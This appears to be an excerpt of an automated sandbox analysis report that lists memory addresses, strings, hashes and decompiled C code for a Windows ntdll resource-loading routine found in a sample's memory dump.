                                                                                                                              0x1d7b01a7
                                                                                                                              0x00000000
                                                                                                                              0x1d7b01a9
                                                                                                                              0x1d7b01b2
                                                                                                                              0x1d7b01b2
                                                                                                                              0x1d7b01a7
                                                                                                                              0x1d7b01be
                                                                                                                              0x1d7b01c1
                                                                                                                              0x1d7b01d7
                                                                                                                              0x1d7b01d7
                                                                                                                              0x1d7b01c1
                                                                                                                              0x1d7b0191
                                                                                                                              0x1d7b017e
                                                                                                                              0x1d76f69c
                                                                                                                              0x1d76f69d
                                                                                                                              0x1d76f69e
                                                                                                                              0x1d76f6a9
                                                                                                                              0x1d76f6a9
                                                                                                                              0x1d76f684
                                                                                                                              0x1d76f58b
                                                                                                                              0x1d76f58e
                                                                                                                              0x1d7b0093
                                                                                                                              0x1d7b0097
                                                                                                                              0x1d7b0099
                                                                                                                              0x1d7b009a
                                                                                                                              0x1d76f594
                                                                                                                              0x1d76f59b
                                                                                                                              0x1d76f59e
                                                                                                                              0x1d76f5a2
                                                                                                                              0x1d76f5a2
                                                                                                                              0x1d76f5a9
                                                                                                                              0x1d76f5ad
                                                                                                                              0x1d76f5b5
                                                                                                                              0x1d76f5bd
                                                                                                                              0x1d76f5c5
                                                                                                                              0x1d76f5d0
                                                                                                                              0x1d76f5d9
                                                                                                                              0x1d76f5dd
                                                                                                                              0x1d76f5e6
                                                                                                                              0x1d76f5e9
                                                                                                                              0x1d76f5ed
                                                                                                                              0x1d76f5f3
                                                                                                                              0x1d76f600
                                                                                                                              0x1d76f607
                                                                                                                              0x1d76f60a
                                                                                                                              0x1d76f60c
                                                                                                                              0x1d76f612
                                                                                                                              0x1d76f6b3
                                                                                                                              0x1d76f6bb
                                                                                                                              0x1d76f618
                                                                                                                              0x1d76f61c
                                                                                                                              0x1d76f61c
                                                                                                                              0x1d76f620
                                                                                                                              0x1d76f622
                                                                                                                              0x1d76f624
                                                                                                                              0x1d76f62a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b0053
                                                                                                                              0x1d7b0053
                                                                                                                              0x1d76f630
                                                                                                                              0x1d76f636
                                                                                                                              0x1d76f63c
                                                                                                                              0x1d76f6c3
                                                                                                                              0x1d76f6c7
                                                                                                                              0x1d76f6d0
                                                                                                                              0x1d76f6d2
                                                                                                                              0x1d76f6d5
                                                                                                                              0x1d76f6dc
                                                                                                                              0x1d76f6e0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76f6e2
                                                                                                                              0x1d76f6e2
                                                                                                                              0x1d76f6e2
                                                                                                                              0x1d76f6e4
                                                                                                                              0x1d76f6e7
                                                                                                                              0x1d76f6ea
                                                                                                                              0x1d76f6ea
                                                                                                                              0x1d76f6f0
                                                                                                                              0x1d76f6f7
                                                                                                                              0x1d76f6f9
                                                                                                                              0x1d76f6fc
                                                                                                                              0x1d76f767
                                                                                                                              0x1d76f6fe
                                                                                                                              0x1d76f700
                                                                                                                              0x1d76f705
                                                                                                                              0x1d76f705
                                                                                                                              0x1d76f708
                                                                                                                              0x1d76f70a
                                                                                                                              0x1d76f70e
                                                                                                                              0x1d76f710
                                                                                                                              0x1d76f770
                                                                                                                              0x1d76f6d2
                                                                                                                              0x1d76f6d5
                                                                                                                              0x1d76f6dc
                                                                                                                              0x1d76f6e0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76f6e0
                                                                                                                              0x1d76f712
                                                                                                                              0x1d76f717
                                                                                                                              0x1d7b005a
                                                                                                                              0x1d7b005a
                                                                                                                              0x1d7b005d
                                                                                                                              0x1d7b0061
                                                                                                                              0x1d7b0067
                                                                                                                              0x1d7b0067
                                                                                                                              0x1d7b006f
                                                                                                                              0x1d7b0072
                                                                                                                              0x1d7b0074
                                                                                                                              0x1d7b0076
                                                                                                                              0x1d7b007c
                                                                                                                              0x1d7b007f
                                                                                                                              0x1d7b007f
                                                                                                                              0x1d7b0084
                                                                                                                              0x1d7b0086
                                                                                                                              0x1d7b008a
                                                                                                                              0x1d7b008a
                                                                                                                              0x1d7b008e
                                                                                                                              0x1d7b0061
                                                                                                                              0x00000000
                                                                                                                              0x1d76f717
                                                                                                                              0x1d76f6d0
                                                                                                                              0x1d76f642
                                                                                                                              0x1d76f644
                                                                                                                              0x1d76f648
                                                                                                                              0x1d76f650
                                                                                                                              0x1d76f6aa
                                                                                                                              0x1d76f6af
                                                                                                                              0x1d76f652
                                                                                                                              0x1d76f658
                                                                                                                              0x1d76f658
                                                                                                                              0x1d76f662
                                                                                                                              0x1d7b00a4
                                                                                                                              0x1d7b00a4
                                                                                                                              0x1d7b00ac
                                                                                                                              0x1d7b00b3
                                                                                                                              0x1d7b00c0
                                                                                                                              0x1d7b00c5
                                                                                                                              0x1d7b00d0
                                                                                                                              0x1d7b00d5
                                                                                                                              0x1d7b00d7
                                                                                                                              0x1d7b00da
                                                                                                                              0x1d7b00dd
                                                                                                                              0x1d7b00e4
                                                                                                                              0x1d7b00e4
                                                                                                                              0x1d7b00df
                                                                                                                              0x1d7b00df
                                                                                                                              0x1d7b00df
                                                                                                                              0x1d7b00e6
                                                                                                                              0x1d7b00e7
                                                                                                                              0x1d7b00e8
                                                                                                                              0x1d7b00eb
                                                                                                                              0x1d7b00fa
                                                                                                                              0x1d7b00ff
                                                                                                                              0x1d7b0102
                                                                                                                              0x1d7b0103
                                                                                                                              0x1d7b0105
                                                                                                                              0x1d7b010e
                                                                                                                              0x1d7b0110
                                                                                                                              0x1d7b0113
                                                                                                                              0x1d7b0115
                                                                                                                              0x1d7b011b
                                                                                                                              0x1d7b011d
                                                                                                                              0x1d7b0121
                                                                                                                              0x1d7b0123
                                                                                                                              0x1d7b0123
                                                                                                                              0x1d7b0121
                                                                                                                              0x1d7b011b
                                                                                                                              0x1d7b0128
                                                                                                                              0x1d7b012d
                                                                                                                              0x1d7b012f
                                                                                                                              0x1d7b0131
                                                                                                                              0x1d7b0135
                                                                                                                              0x1d7b013a
                                                                                                                              0x1d7b013e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76f668
                                                                                                                              0x1d76f668
                                                                                                                              0x1d76f66a
                                                                                                                              0x1d76f66e
                                                                                                                              0x1d76f5a2
                                                                                                                              0x1d76f677
                                                                                                                              0x1d76f67c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76f67c

                                                                                                                              Strings
                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1D7B00F1
                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1D7B00C7
                                                                                                                              • RTL: Re-Waiting, xrefs: 1D7B0128
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                              • API String ID: 0-2474120054
                                                                                                                              • Opcode ID: 4d2e55ddb0f282e2669adedec92595be8b5991fa955c632cec433dfa89fc6102
                                                                                                                              • Instruction ID: bcbf1a15022ec82ae899e35ed461e4fab472ef95e939e8f7e44f01775aba29af
                                                                                                                              • Opcode Fuzzy Hash: 4d2e55ddb0f282e2669adedec92595be8b5991fa955c632cec433dfa89fc6102
                                                                                                                              • Instruction Fuzzy Hash: 23E1BF72608742DFE312CF28C885B1AB7E0BB45734F504A5AF9A58B2E1E734E944CB53
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D74B9C0 Relevance: 4.1, Strings: 3, Instructions: 361COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E1D74B9C0(intOrPtr __ecx, signed int __edx, intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
				signed int _v8;
				char _v148;
				char _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				intOrPtr _v180;
				signed int _v184;
				intOrPtr* _v188;
				char _v189;
				char _v190;
				intOrPtr _v196;
				signed int _v200;
				signed short _v204;
				signed int _v205;
				signed int _v208;
				void* _v209;
				void* _v212;
				void* _v213;
				signed short _v216;
				void* _v220;
				void* _v225;
				void* _v228;
				void* _v232;
				void* _v240;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t146;
				signed int _t148;
				signed int _t149;
				signed short _t150;
				void* _t152;
				signed int _t154;
				signed short _t155;
				signed short _t168;
				signed int _t183;
				signed int _t184;
				intOrPtr* _t188;
				char _t190;
				signed int* _t192;
				signed char* _t193;
				signed int _t196;
				signed int _t206;
				void* _t207;
				intOrPtr _t210;
				signed int _t211;
				signed int _t216;
				intOrPtr _t219;
				signed int _t223;
				signed short _t239;
				void* _t243;
				signed int _t245;
				void* _t246;
				signed int _t247;
				signed int _t249;

				_t249 = (_t247 & 0xfffffff8) - 0xcc;
				_v8 =  *0x1d83b370 ^ _t249;
				_v180 = __ecx;
				_t146 = __edx;
				_t229 = 0;
				_v188 = _a12;
				_t210 = _a4;
				_t245 = 0;
				_v168 = __edx;
				_v196 = 0xc00b0001;
				_v184 = 0;
				_v204 = 0;
				_v189 = 0;
				_v200 = 0;
				_v176 = 0;
				_v164 = 0;
				_v190 = 0;
				if(_t210 != 3) {
					__eflags = _t210 - 4;
					if(__eflags == 0) {
						goto L1;
					}
					_t168 = 0xc00000f1;
					L29:
					_pop(_t243);
					_pop(_t246);
					_pop(_t207);
					return E1D784B50(_t168, _t207, _v8 ^ _t249, _t229, _t243, _t246);
				}
				L1:
				_t15 = _t146 + 8; // 0xff1075ff
				_v160 =  *_t15 & 0x0000ffff;
				_v205 = _t229;
				while(1) {
					L2:
					_t211 = _a8;
					while(1) {
						L3:
						_v172 = _t245;
						_t206 = _t211 & 0x01000000;
						if(_t206 != 0) {
							goto L38;
						}
						L4:
						_t149 = _t245;
						_t245 = _t245 + 1;
						if(_t149 == 0) {
							_t150 = _v160;
							__eflags = _t150;
							if(__eflags == 0) {
								L35:
								_v204 = 0xeeee;
								while(1) {
									L3:
									_v172 = _t245;
									_t206 = _t211 & 0x01000000;
									if(_t206 != 0) {
										goto L38;
									}
									goto L4;
								}
								goto L38;
							}
							__eflags = _t150 - 0x400;
							if(__eflags == 0) {
								goto L35;
							}
							__eflags = _t150 - 0x800;
							if(__eflags == 0) {
								goto L35;
							}
							_t239 = _t150;
							_v204 = _t239;
							L13:
							if(_t239 == 0xeeee) {
								continue;
							}
							L14:
							_t148 = 0;
							if(_t229 != 0) {
								while(1) {
									__eflags =  *((intOrPtr*)(_t249 + 0x50 + _t148 * 2)) - _t239;
									if(__eflags == 0) {
										goto L3;
									}
									_t148 = _t148 + 1;
									__eflags = _t148 - _t229;
									if(__eflags >= 0) {
										goto L15;
									}
								}
								continue;
							}
							L15:
							_t262 = _t229 - 0x40;
							if(_t229 >= 0x40) {
								L28:
								_t168 = _v196;
								goto L29;
							}
							 *(_t249 + 0x54 + _t229 * 2) = _t239;
							_v156 = 0;
							_v200 = _t229;
							_t168 = E1D74BDE0(_t206, _t239, _t245, _t262, _v180, _v204,  &_v184,  &_v156, _t211);
							_v216 = _t168;
							if(_t168 < 0) {
								__eflags = _t168 - 0xc000003a;
								if(_t168 == 0xc000003a) {
									L54:
									_t168 = 0xc00b0001;
									_v196 = 0xc00b0001;
									L44:
									__eflags = _t206;
									if(__eflags != 0) {
										goto L29;
									}
									_t229 = _v200;
									while(1) {
										L2:
										_t211 = _a8;
										goto L3;
									}
								}
								__eflags = _t168 - 0xc0000034;
								if(_t168 == 0xc0000034) {
									goto L54;
								}
								goto L44;
							}
							 *(_v168 + 8) = _t239 & 0x0000ffff;
							_v189 = 1;
							_t216 = E1D74C6E0(_v184, _v168, 3, 0x2000030, _v188);
							_t183 = _a8 & 0x00000040;
							_v208 = _t216;
							_v184 = _t183;
							if(_t183 != 0) {
								__eflags = _t216;
								if(_t216 < 0) {
									L67:
									_t229 = _v184;
									_t184 = E1D73A480(_v184);
									__eflags = _t184;
									if(_t184 != 0) {
										goto L28;
									}
									__eflags = _t206;
									if(__eflags != 0) {
										goto L28;
									}
									_t229 = _v200;
									while(1) {
										L2:
										_t211 = _a8;
										goto L3;
									}
								}
								_t216 = E1D74872A(_v184,  *_v188, 0,  *((intOrPtr*)(_v168 + 0xc)), 0);
								_t188 = _v200;
								_v208 = _t216;
								__eflags = _t216;
								if(_t216 >= 0) {
									L20:
									_t219 =  *_t188;
									_t229 = _v184;
									if(_t219 <= _t229) {
										L82:
										_v196 = 0xc000007b;
										 *_t188 = 0;
										E1D7CEF10(0x55, 2, "\'LDR: %s(), invalid image format of MUI file \n", "LdrpLoadResourceFromAlternativeModule");
										_t249 = _t249 + 0x10;
										__eflags = _t206;
										if(__eflags != 0) {
											_t168 = 0xc000007b;
											goto L29;
										}
										_t229 = _v200;
										while(1) {
											L2:
											_t211 = _a8;
											goto L3;
										}
									}
									_t190 = _v156;
									if(_t190 == 0 || _t219 < _t190 + _t229) {
										_t192 =  *( *[fs:0x30] + 0x50);
										if(_t192 != 0) {
											__eflags =  *_t192;
											if( *_t192 == 0) {
												goto L24;
											}
											_t193 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											L25:
											if(( *_t193 & 0x00000002) != 0) {
												__eflags = _v172;
												if(_v172 == 0) {
													__eflags = _a8 & 0x00000001;
													_t138 = (_a8 & 0x00000001) != 0;
													__eflags = _t138;
													_t196 = 3 + (0 | _t138) * 2;
												} else {
													_t196 = 9;
												}
												_t229 = _v168;
												E1D7CF9AA(_v184, _v168, _a4, _t196);
											}
											if( *((intOrPtr*)( *[fs:0x18] + 0xfe0)) != 0) {
												 *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0xfe0)))) = _v180;
											}
											goto L28;
										}
										L24:
										_t193 = 0x7ffe0385;
										goto L25;
									} else {
										_t188 = _v188;
										goto L82;
									}
								}
								 *_t188 = 0;
								L19:
								if(_t216 < 0) {
									goto L67;
								}
								goto L20;
							}
							_t188 = _v188;
							goto L19;
						}
						_t152 = _t149 - 1;
						if(_t152 == 0) {
							__eflags = _t239 - 0xeeee;
							if(__eflags != 0) {
								__eflags = _t211 & 0x00000004;
								if(__eflags != 0) {
									_t239 = 0xeeee;
									_t245 = 0xfffffffe;
									_v204 = 0xeeee;
									continue;
								}
								__eflags = _v160 & 0x000003ff;
								if(__eflags == 0) {
									goto L35;
								}
								_t154 = E1D7388C8(_t239,  &_v204);
								_t211 = _a8;
								_t229 = _v200;
								__eflags = _t154;
								if(__eflags < 0) {
									L59:
									_t245 = 0xfffffffe;
									goto L35;
								}
								_t239 = _v204;
								__eflags = _t239;
								if(__eflags != 0) {
									_t245 = _v172;
									goto L13;
								}
								goto L59;
							}
							goto L35;
						}
						_t155 = _t152 - 1;
						if(_t155 != 0) {
							__eflags = _t155 == 1;
							if(_t155 == 1) {
								_t223 = _v164;
								__eflags = _t223;
								if(_t223 != 0) {
									L63:
									__eflags =  *_t223 - 0xfecdfecd;
									if(__eflags != 0) {
										L65:
										_t229 = _v200;
										_t239 = 0xeeee;
										_v204 = 0xeeee;
										while(1) {
											L2:
											_t211 = _a8;
											goto L3;
										}
									}
									__eflags =  *(_t223 + 0x18) & 0x00000002;
									if(__eflags != 0) {
										_t157 =  *(_t223 + 0x7c);
										__eflags =  *(_t223 + 0x7c);
										if(__eflags == 0) {
											goto L65;
										}
										E1D785050(_t223,  &_v148, _t157 + _t223);
										__eflags = E1D7656E0( &_v156,  &_v160);
										if(__eflags == 0) {
											_v196 = 0xc00b0005;
											goto L65;
										}
										_t239 =  *((intOrPtr*)(_t249 + 0x44));
										_t211 = _a8;
										_v204 = _t239;
										__eflags = _t211 & 0x00100000;
										if(__eflags == 0) {
											L12:
											_t229 = _v200;
											goto L13;
										}
										E1D74A750( *((intOrPtr*)( *[fs:0x18] + 0xfc0)), 0,  &_v204,  &_v205);
										__eflags =  *((char*)(_t249 + 0xf));
										if(__eflags != 0) {
											L66:
											_t229 = _v200;
											_t239 = 0xeeee;
											_v204 = 0xeeee;
											goto L2;
										}
										_t239 = _v204;
										_t211 = _a8;
										goto L12;
									}
									goto L65;
								}
								_t223 = E1D748858(_v180, _t223, 1);
								_v172 = _t223;
								__eflags = _t223;
								if(__eflags == 0) {
									goto L65;
								}
								goto L63;
							}
							__eflags = _v190;
							if(_v190 != 0) {
								goto L28;
							}
							__eflags = _v189;
							if(_v189 != 0) {
								goto L28;
							}
							__eflags = L1D7387E0(_v180);
							if(__eflags < 0) {
								goto L28;
							}
							_t245 = 0;
							_t211 = _a8 | 0x00400000;
							_v190 = 1;
							_t229 = 0;
							_a8 = _t211;
							_v200 = 0;
							_v176 = 0;
							continue;
						}
						_v204 = _t155;
						if(E1D74A630() == 0) {
							goto L66;
						}
						_t227 = _v176;
						if(_v176 >= ( *( *((intOrPtr*)( *[fs:0x18] + 0xfc0)) + 4) & 0x0000ffff)) {
							goto L66;
						}
						E1D74A750( *((intOrPtr*)( *[fs:0x18] + 0xfc0)), _t227,  &_v204,  &_v205);
						_t239 = _v216;
						if(_t239 == 0) {
							goto L66;
						}
						_t211 = _a8;
						if(_v205 != _t206) {
							__eflags = _t211 & 0x00100000;
							if(__eflags != 0) {
								_t239 = 0xeeee;
								_v204 = 0xeeee;
							}
						}
						_v176 = _v176 + 1;
						_t245 = _v172;
						goto L12;
						L38:
						_t239 = 0xf2ee;
						_v204 = 0xf2ee;
						goto L14;
					}
				}
			}






























































                                                                                                                              0x1d74b9c8
                                                                                                                              0x1d74b9d5
                                                                                                                              0x1d74b9de
                                                                                                                              0x1d74b9e2
                                                                                                                              0x1d74b9e7
                                                                                                                              0x1d74b9ea
                                                                                                                              0x1d74b9f0
                                                                                                                              0x1d74b9f3
                                                                                                                              0x1d74b9f5
                                                                                                                              0x1d74b9f9
                                                                                                                              0x1d74ba01
                                                                                                                              0x1d74ba09
                                                                                                                              0x1d74ba0e
                                                                                                                              0x1d74ba13
                                                                                                                              0x1d74ba17
                                                                                                                              0x1d74ba1b
                                                                                                                              0x1d74ba1f
                                                                                                                              0x1d74ba26
                                                                                                                              0x1d74bc41
                                                                                                                              0x1d74bc44
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a37c7
                                                                                                                              0x1d74bbe3
                                                                                                                              0x1d74bbea
                                                                                                                              0x1d74bbeb
                                                                                                                              0x1d74bbec
                                                                                                                              0x1d74bbf7
                                                                                                                              0x1d74bbf7
                                                                                                                              0x1d74ba2c
                                                                                                                              0x1d74ba2c
                                                                                                                              0x1d74ba30
                                                                                                                              0x1d74ba34
                                                                                                                              0x1d74ba38
                                                                                                                              0x1d74ba38
                                                                                                                              0x1d74ba38
                                                                                                                              0x1d74ba40
                                                                                                                              0x1d74ba40
                                                                                                                              0x1d74ba42
                                                                                                                              0x1d74ba46
                                                                                                                              0x1d74ba4c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74ba52
                                                                                                                              0x1d74ba52
                                                                                                                              0x1d74ba54
                                                                                                                              0x1d74ba57
                                                                                                                              0x1d74bbfa
                                                                                                                              0x1d74bbfe
                                                                                                                              0x1d74bc01
                                                                                                                              0x1d74bc32
                                                                                                                              0x1d74bc37
                                                                                                                              0x1d74ba40
                                                                                                                              0x1d74ba40
                                                                                                                              0x1d74ba42
                                                                                                                              0x1d74ba46
                                                                                                                              0x1d74ba4c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74ba4c
                                                                                                                              0x00000000
                                                                                                                              0x1d74ba40
                                                                                                                              0x1d74bc08
                                                                                                                              0x1d74bc0b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74bc12
                                                                                                                              0x1d74bc15
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74bc17
                                                                                                                              0x1d74bc1a
                                                                                                                              0x1d74bae1
                                                                                                                              0x1d74bae9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74baef
                                                                                                                              0x1d74baef
                                                                                                                              0x1d74baf3
                                                                                                                              0x1d74bcc0
                                                                                                                              0x1d74bcc0
                                                                                                                              0x1d74bcc5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74bccb
                                                                                                                              0x1d74bccc
                                                                                                                              0x1d74bcce
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74bcd4
                                                                                                                              0x00000000
                                                                                                                              0x1d74bcc0
                                                                                                                              0x1d74baf9
                                                                                                                              0x1d74baf9
                                                                                                                              0x1d74bafc
                                                                                                                              0x1d74bbdf
                                                                                                                              0x1d74bbdf
                                                                                                                              0x00000000
                                                                                                                              0x1d74bbdf
                                                                                                                              0x1d74bb07
                                                                                                                              0x1d74bb11
                                                                                                                              0x1d74bb23
                                                                                                                              0x1d74bb27
                                                                                                                              0x1d74bb2c
                                                                                                                              0x1d74bb32
                                                                                                                              0x1d74bc97
                                                                                                                              0x1d74bc9c
                                                                                                                              0x1d74bd0b
                                                                                                                              0x1d74bd0b
                                                                                                                              0x1d74bd10
                                                                                                                              0x1d74bca5
                                                                                                                              0x1d74bca5
                                                                                                                              0x1d74bca7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74bcad
                                                                                                                              0x1d74ba38
                                                                                                                              0x1d74ba38
                                                                                                                              0x1d74ba38
                                                                                                                              0x00000000
                                                                                                                              0x1d74ba3b
                                                                                                                              0x1d74ba38
                                                                                                                              0x1d74bc9e
                                                                                                                              0x1d74bca3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74bca3
                                                                                                                              0x1d74bb4a
                                                                                                                              0x1d74bb53
                                                                                                                              0x1d74bb5d
                                                                                                                              0x1d74bb62
                                                                                                                              0x1d74bb65
                                                                                                                              0x1d74bb69
                                                                                                                              0x1d74bb6d
                                                                                                                              0x1d74bc5e
                                                                                                                              0x1d74bc60
                                                                                                                              0x1d74bdb7
                                                                                                                              0x1d74bdb7
                                                                                                                              0x1d74bdbf
                                                                                                                              0x1d74bdc4
                                                                                                                              0x1d74bdc6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a38e7
                                                                                                                              0x1d7a38e9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a38ef
                                                                                                                              0x1d74ba38
                                                                                                                              0x1d74ba38
                                                                                                                              0x1d74ba38
                                                                                                                              0x00000000
                                                                                                                              0x1d74ba3b
                                                                                                                              0x1d74ba38
                                                                                                                              0x1d74bc80
                                                                                                                              0x1d74bc82
                                                                                                                              0x1d74bc86
                                                                                                                              0x1d74bc8a
                                                                                                                              0x1d74bc8c
                                                                                                                              0x1d74bb7f
                                                                                                                              0x1d74bb7f
                                                                                                                              0x1d74bb81
                                                                                                                              0x1d74bb87
                                                                                                                              0x1d7a38b6
                                                                                                                              0x1d7a38c4
                                                                                                                              0x1d7a38cc
                                                                                                                              0x1d7a38d2
                                                                                                                              0x1d7a38d7
                                                                                                                              0x1d7a38da
                                                                                                                              0x1d7a38dc
                                                                                                                              0x1d7a394b
                                                                                                                              0x00000000
                                                                                                                              0x1d7a394b
                                                                                                                              0x1d7a38de
                                                                                                                              0x1d74ba38
                                                                                                                              0x1d74ba38
                                                                                                                              0x1d74ba38
                                                                                                                              0x00000000
                                                                                                                              0x1d74ba3b
                                                                                                                              0x1d74ba38
                                                                                                                              0x1d74bb8d
                                                                                                                              0x1d74bb93
                                                                                                                              0x1d74bba5
                                                                                                                              0x1d74bbaa
                                                                                                                              0x1d7a38f8
                                                                                                                              0x1d7a38fb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a390a
                                                                                                                              0x1d74bbb5
                                                                                                                              0x1d74bbb8
                                                                                                                              0x1d7a3914
                                                                                                                              0x1d7a3919
                                                                                                                              0x1d7a3922
                                                                                                                              0x1d7a392b
                                                                                                                              0x1d7a392b
                                                                                                                              0x1d7a392e
                                                                                                                              0x1d7a391b
                                                                                                                              0x1d7a391b
                                                                                                                              0x1d7a391b
                                                                                                                              0x1d7a3935
                                                                                                                              0x1d7a3941
                                                                                                                              0x1d7a3941
                                                                                                                              0x1d74bbcb
                                                                                                                              0x1d74bbdd
                                                                                                                              0x1d74bbdd
                                                                                                                              0x00000000
                                                                                                                              0x1d74bbcb
                                                                                                                              0x1d74bbb0
                                                                                                                              0x1d74bbb0
                                                                                                                              0x00000000
                                                                                                                              0x1d7a38b2
                                                                                                                              0x1d7a38b2
                                                                                                                              0x00000000
                                                                                                                              0x1d7a38b2
                                                                                                                              0x1d74bb93
                                                                                                                              0x1d7a38a7
                                                                                                                              0x1d74bb77
                                                                                                                              0x1d74bb79
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74bb79
                                                                                                                              0x1d74bb73
                                                                                                                              0x00000000
                                                                                                                              0x1d74bb73
                                                                                                                              0x1d74ba5d
                                                                                                                              0x1d74ba60
                                                                                                                              0x1d74bc29
                                                                                                                              0x1d74bc2c
                                                                                                                              0x1d74bd16
                                                                                                                              0x1d74bd19
                                                                                                                              0x1d7a3895
                                                                                                                              0x1d7a3898
                                                                                                                              0x1d7a389d
                                                                                                                              0x00000000
                                                                                                                              0x1d7a389d
                                                                                                                              0x1d74bd1f
                                                                                                                              0x1d74bd27
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74bd34
                                                                                                                              0x1d74bd39
                                                                                                                              0x1d74bd3c
                                                                                                                              0x1d74bd40
                                                                                                                              0x1d74bd42
                                                                                                                              0x1d74bd4e
                                                                                                                              0x1d74bd4e
                                                                                                                              0x00000000
                                                                                                                              0x1d74bd4e
                                                                                                                              0x1d74bd44
                                                                                                                              0x1d74bd49
                                                                                                                              0x1d74bd4c
                                                                                                                              0x1d74bd58
                                                                                                                              0x00000000
                                                                                                                              0x1d74bd58
                                                                                                                              0x00000000
                                                                                                                              0x1d74bd4c
                                                                                                                              0x00000000
                                                                                                                              0x1d74bc2c
                                                                                                                              0x1d74ba66
                                                                                                                              0x1d74ba69
                                                                                                                              0x1d74bcd6
                                                                                                                              0x1d74bcd9
                                                                                                                              0x1d74bd61
                                                                                                                              0x1d74bd65
                                                                                                                              0x1d74bd67
                                                                                                                              0x1d74bd7f
                                                                                                                              0x1d74bd7f
                                                                                                                              0x1d74bd85
                                                                                                                              0x1d74bd91
                                                                                                                              0x1d74bd91
                                                                                                                              0x1d74bd95
                                                                                                                              0x1d74bd9a
                                                                                                                              0x1d74ba38
                                                                                                                              0x1d74ba38
                                                                                                                              0x1d74ba38
                                                                                                                              0x00000000
                                                                                                                              0x1d74ba3b
                                                                                                                              0x1d74ba38
                                                                                                                              0x1d74bd87
                                                                                                                              0x1d74bd8b
                                                                                                                              0x1d7a37f3
                                                                                                                              0x1d7a37f6
                                                                                                                              0x1d7a37f8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3806
                                                                                                                              0x1d7a381a
                                                                                                                              0x1d7a381c
                                                                                                                              0x1d7a386d
                                                                                                                              0x00000000
                                                                                                                              0x1d7a386d
                                                                                                                              0x1d7a381e
                                                                                                                              0x1d7a3823
                                                                                                                              0x1d7a3826
                                                                                                                              0x1d7a382b
                                                                                                                              0x1d7a3831
                                                                                                                              0x1d74badd
                                                                                                                              0x1d74badd
                                                                                                                              0x00000000
                                                                                                                              0x1d74badd
                                                                                                                              0x1d7a3850
                                                                                                                              0x1d7a3855
                                                                                                                              0x1d7a385a
                                                                                                                              0x1d74bda4
                                                                                                                              0x1d74bda4
                                                                                                                              0x1d74bda8
                                                                                                                              0x1d74bdad
                                                                                                                              0x00000000
                                                                                                                              0x1d74bdad
                                                                                                                              0x1d7a3860
                                                                                                                              0x1d7a3865
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3865
                                                                                                                              0x00000000
                                                                                                                              0x1d74bd8b
                                                                                                                              0x1d74bd75
                                                                                                                              0x1d74bd77
                                                                                                                              0x1d74bd7b
                                                                                                                              0x1d74bd7d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74bd7d
                                                                                                                              0x1d74bcdf
                                                                                                                              0x1d74bce4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74bcea
                                                                                                                              0x1d74bcef
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74bcfe
                                                                                                                              0x1d74bd00
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a37d4
                                                                                                                              0x1d7a37d6
                                                                                                                              0x1d7a37dc
                                                                                                                              0x1d7a37e1
                                                                                                                              0x1d7a37e3
                                                                                                                              0x1d7a37e6
                                                                                                                              0x1d7a37ea
